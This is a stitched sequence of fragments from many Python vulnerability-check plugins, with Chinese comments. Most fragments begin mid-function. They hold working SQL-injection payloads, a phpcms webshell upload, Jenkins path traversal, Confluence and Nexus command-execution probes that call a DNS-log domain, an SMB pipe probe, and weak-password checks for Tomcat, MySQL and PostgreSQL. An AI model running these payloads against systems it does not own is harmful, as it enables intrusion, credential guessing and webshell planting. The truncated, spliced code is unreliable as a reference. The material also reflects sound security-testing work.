def _attack(self): result = {} self._verify() def _verify(self): result = {} vulurl = "%s/?m=hotel.getHotelInfo" % self.url payload = {"hotelId":"11 AND (SELECT 6261 FROM(SELECT COUNT(*),CONCAT(0x7e7e7e,(MID((IFNULL(CAST(MD5(3.14) AS CHAR),0x20)),1,50)),0x7e7e7e,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)"} resp = req.post(vulurl,data = payload,timeout =15) re_result = re.findall(r'~~~(.*?)~~~', resp.content, re.S|re.I) if re_result: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vulurl result['VerifyInfo']['Payload'] = payload return self.parse_output(result) def parse_output(self, result): #parse output output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(TestPOC)
s.send(binascii.unhexlify(tree_connect_andx_request)) data = s.recv(1024) all_id = data[28:36] payload = "0000004aff534d422500000000180128000000000000000000000000%s1000000000ffffffff000000000000000000" \ "0000004a0000004a0002002300000007005c504950455c00" % all_id.encode('hex') s.send(binascii.unhexlify(payload)) data = s.recv(1024) s.close() if "\x05\x02\x00\xc0" in data: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = payload[:20] result['VerifyInfo']['result'] = data[:20] except Exception as e: pass return self.parse_attack(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet noting return') return output register(TestPOC)
client = paramiko.SSHClient() client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) client.connect(hostname, port=int(port), username=username, password="", pkey=None, key_filename=keyfile) stdin, stdout, stderr = client.exec_command(command) cmd_output = stdout.read() client.close() return True if cmd_output == 'root' else False except IOError: logger.debug( "Generate a keyfile for tool to bypass remote/local server credentials." ) return False except paramiko.SSHException as e: logger.debug( "TCPForwarding disabled on remote server can't connect. Not Vulnerable" ) return False except socket.error: logger.debug("Unable to connect.") return False register(DemoPOC)
print '%s is vulnerable!' % testurl return True else: print '没有发现关键字:successfully. ' return False except Exception as e: print '连接失败' pass return self.save_output(result) #攻击模块 def _attack(self): pass #输出报告 def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(TomcatuploadPOC)
except: #print e pass if vul_port.__len__() > 0: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['Payload'] = "port:" + str(vul_port) print '[+]28 poc done' return self.save_output(result) #pass # 攻击模块 def _attack(self): return self._verify() #pass # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register(HadoopPOC)
临时判断 , 有正确和误报时,对比提取特征解决误报 """ #print r,type(r) title = re.findall(r"<title>(.*)</title>", r.content)[0] if 'Solr Admin' in title and 'Dashboard' in r.content: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = Payload else: result = {} print '[+]7 poc done' return self.save_output(result) #漏洞攻击 def _attack(self): result = {} # 攻击代码 return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register(SolrPOC)
cmd = "ping {0}.{1}".format(self.BANNER, self.DOMAIN) self._verify(template, cmd) if self.dnslog_sucess(self.CEYE_URL): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = target_url return self.save_output(result) # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 验证DNS已被解析,命令执行 def dnslog_sucess(self, url): _resp = req.get(url) d = _resp.json() try: name = d['data'][0]['name'] if self.BANNER in name: return True except Exception: return False # 注册类 register(ConfluenceRcePOC)
try: resp = req.get(url=vul_url, timeout=3, verify=False) if resp.headers[ 'Content-Type'] and 'application/json' in resp.headers[ 'Content-Type'] and len(resp.content) > 500: result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vul_url result['VerifyInfo']['Payload'] = 'path:/{}'.format(i) break except Exception as e: pass print '[+]58 poc done' return self.save_output(result) #攻击模块 def _attack(self): pass #输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(ActuaorPOC)
result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = vul_url else: print '[+] No Vulnerable found' except Exception as e: print e pass print '[+]44 poc done' return self.save_output(result) #攻击模块 def _attack(self): result = {} return self._verify() #输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(DNSPOC)
else: print '[-]The X-Proxy-Cache is MISS.' print '[-]Can not find the vuln.' else: print '[-]The header without X-Proxy-Cache.' print '[-]Can not find the vuln.' except Exception as e: # return host print e return self.save_output(result) #漏洞攻击 def _attack(self): result = {} # 攻击代码 return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register(NginxPOC)
return self.save_output(result) return self.save_output(result) # 验证DNS已被解析,命令执行 def dnslog_sucess(self, url): resp = req.get(url) d = resp.json() try: name = d['data'][0]['name'] if self.BANNER in name: return True except Exception: return False # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register(NexusManagerPOC)
return True else: print '没有发现 :root: 特征字' return False except Exception as e: print 'socket连接失败' pass sock.close() return self.save_output(result) #攻击模块 def _attack(self): pass #输出报告 def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(fastcgiPOC)
output.fail('Internet nothing returned') return output def query(self, ns): nsaddr = self.resolve_a(ns) try: z = self.pull_zone(nsaddr) except (exception.FormError, socket.error, EOFError): print >> sys.stderr, "AXFR failed\n" return None else: return z def resolve_a(self, name): """Pulls down an A record for a name""" nsres = resolver.query(name, 'A') return str(nsres[0]) def pull_zone(self, nameserver): """Sends the domain transfer request""" q = query.xfr(nameserver, self.domain, relativize=False, timeout=2) zone = "" for m in q: zone += str(m) if not zone: raise EOFError return zone register(DNS_transforPoc)
references = ['https://www.openssl.org/~bodo/ssl-poodle.pdf'] name = 'SSL 3.0 POODLE攻击信息泄露漏洞 POC' appPowerLink = 'https://tools.ietf.org/html/rfc6101' appName = 'SSL' appVersion = '3.0' vulType = 'Information Disclosure' desc = ''' SSL 3.0使用的CBC块加密的实现存在漏洞,攻击者可以成功破解SSL连接的加密信息,比如获取用户cookie数据 ''' samples = ['www.baidu.com', 'taobao.com'] def _verify(self): result = {} output = Output(self) target_ip = url2ip(self.url) url = urlparse.urlparse(self.url) port = url.port or 443 if check_poodle(target_ip, port): output.success(result) else: output.fail('Not support SSLv3 connection. Not Vulnerable') return output def _attack(self): return self._verify() register(SSLv3_POODLE)
u, pwd, 'mysql', connect_timeout=_conn_timeout) conn.close() result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = u + ":" + pwd return self.save_output(result) except Exception as e: pass return self.save_output(result) # 攻击模块 def _attack(self): return self._verify() #pass # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register(MYSQLPOC)
print(message) result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = pay return True else: print '没有发现关键字.' return False return self.save_output(result) #攻击模块 def _attack(self): pass #输出报告 def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(iis_RCE_POC)
# print check if response: for x in check: if salt in check[x]: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url result['VerifyInfo']['Payload'] = 'Host: ' + salt break else: result = {} print '[+]25 poc done' return self.save_output(result) #漏洞攻击 def _attack(self): result = {} # 攻击代码 return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register(HTTPPOC)
break else: break except: return 0 return 0 def _attack(self): '''attack mode''' return self._verify() def _verify(self): '''verify mode''' result = {} # self.url = self.url checkcode = self.TestingCms(self.url) if checkcode == 1: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url return self.parse_output(result) def parse_output(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output register(DedeShortNamePOC)
s.connect((ip, port)) print('Rsync未授权访问') message = 'Rsync 873端口 未授权访问' result['VerifyInfo'] = {} result['VerifyInfo']['url'] = ip result['VerifyInfo']['Payload'] = message except Exception as e: print(e) s.close() print '[+]30 poc done' return self.save_output(result) def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #攻击模块 def _attack(self): result = {} # 攻击代码 return self._verify() #注册类 register(rsyncPOC)
print '当前 ' + u + ":" + p reponse = req.get(vul_url, timeout=5, headers=header) if ("Tomcat Web Application Manager" in reponse.text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = u + ":" + p except Exception as e: print e pass print '[+]34 poc done' return self.save_output(result) #攻击模块 def _attack(self): pass #输出报告 def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(TomcatPOC)
def test_register_poc(self): register(test_class) assert kb.registered_pocs is not None assert test_class.__module__.split('.')[-1] in kb.registered_pocs
'xajax': 'LiveMessage', 'xajaxargs[0][name]': "1',(SELECT 1 FROM (select count(*),concat(" "floor(rand(0)*2),(select md5(233)))a from " "information_schema.tables group by a)b)," "'','','','1','127.0.0.1','2') #" } response = req.post(vul_url, data=payload, timeout=30).content if 'e165421110ba03099a1c0393373c5b43' in response: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url return self.parse_attack(result) def _attack(self): return self._verify() def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail("Internet nothing returned") return output register(CmsEasyPoc)
""" 临时判断 , 有正确和误报时,对比提取特征解决误报 """ #print r,type(r) if "Druid Console" in title: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = vul_url else: pass print '[+]8 poc done' return self.save_output(result) #漏洞攻击 def _attack(self): result = {} # 攻击代码 return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register(DruidPOC)
sk.connect((_host, _port)) except Exception: return self.save_output(result) sk.close() resulta = checkUsername("rootasdf23", _host) if (resulta == "1"): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = _host result['VerifyInfo']['Payload'] = "存在ssh 用户枚举".decode("utf8") return self.save_output(result) #攻击模块 def _attack(self): result = {} return self._verify() #输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(SS1HPOC)
text = req.get(url,timeout=4).text if ("index.php" in text and "robots.txt" in text) or ("Configuration File" in text): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_ip result['VerifyInfo']['Payload'] = p return self.save_output(result) except Exception as e: print e pass return self.save_output(result) # 攻击模块 def _attack(self): return self._verify() #pass # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register(webLogicPOC)
result['VerifyInfo']['Payload'] = ip + 'fastcgi read file vul' return self.save_output(result) except: print '连接失败' pass sock.close() # print '-' * 18 + '\n' print data # print '-' * 18 + '\n' #攻击模块 def _attack(self): pass #输出报告 def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(MSPOC)
#如果有结果则输出 if len(payload_dict) != 0 : for i in payload_dict: if payload_dict.values().count(payload_dict[i]) == 1: final_url.append(i) print final_url if ((len(final_url)) != 0 and (len(final_url)) <15): result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = vul_url result['VerifyInfo']['Payload'] = str(final_url) print '[+]11 poc done' return self.save_output(result) #漏洞攻击 def _attack(self): result = {} # 攻击代码 return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register(FilefindPOC)
ret = ssltest(_host, _port) # print ret if ret == "check": result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = host result['VerifyInfo']['Payload'] = payload else: pass except: pass print '[+]20 poc done' return self.save_output(result) #漏洞攻击 def _attack(self): result = {} # 攻击代码 return self._verify() def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output register(OpensslPOC)
"dosubmit": "1", "protocol": "", } match = "img src=(.+?)(/[0-9]{4}/[0-9]{4}/)([0-9]+?).php" resp = req.post(url, data=data) shell = re.findall(match, resp.text) shellinfo = ''.join(shell[0]) + ".php" if shell: result['VerifyInfo'] = {} result['VerifyInfo']['URL'] = self.url shell_resp = req.get(shellinfo) if shell_resp.status_code == 200: result['VerifyInfo']['webshell'] = shellinfo return self.parse_attack(result) _attack = _verify def parse_attack(self, result): output = Output(self) if result: output.success(result) else: output.fail('Internet nothing returned') return output def _attack(self): return self._verify() register(phpcms_getshll)
header = {'Accept-Language': ('../' * BACKDIR_COUNT) + file_name} try: vulurl = vul_ip + '/plugin/credentials/.ini' vulurltest = req.get(vulurl, headers=header) if "MPEGVideo" in vulurltest.text: if vulurltest.text.find('version'): result['VerifyInfo'] = {} result['VerifyInfo']['url'] = vulurl result['VerifyInfo']['Payload'] = header except Exception as e: pass return self.save_output(result) # 攻击模块 def _attack(self): return self._verify() # 输出报告 def save_output(self, result): output = Output(self) if result: output.success(result) else: output.fail() return output # 注册类 register(JenkinsPOC)
message = u' {} 5432端口 Postgresql 存在弱口令: postgres {}'.format( _host, pwd) print "有弱口令漏洞" conn.close() result['VerifyInfo'] = {} result['VerifyInfo']['url'] = self.url result['VerifyInfo']['Payload'] = message break except Exception as e: print e print '[+]29 poc done' return self.save_output(result) #攻击模块 def _attack(self): return self._verify() #输出报告 def save_output(self, result): #判断有无结果并输出 output = Output(self) if result: output.success(result) else: output.fail() return output #注册类 register(PGPOC)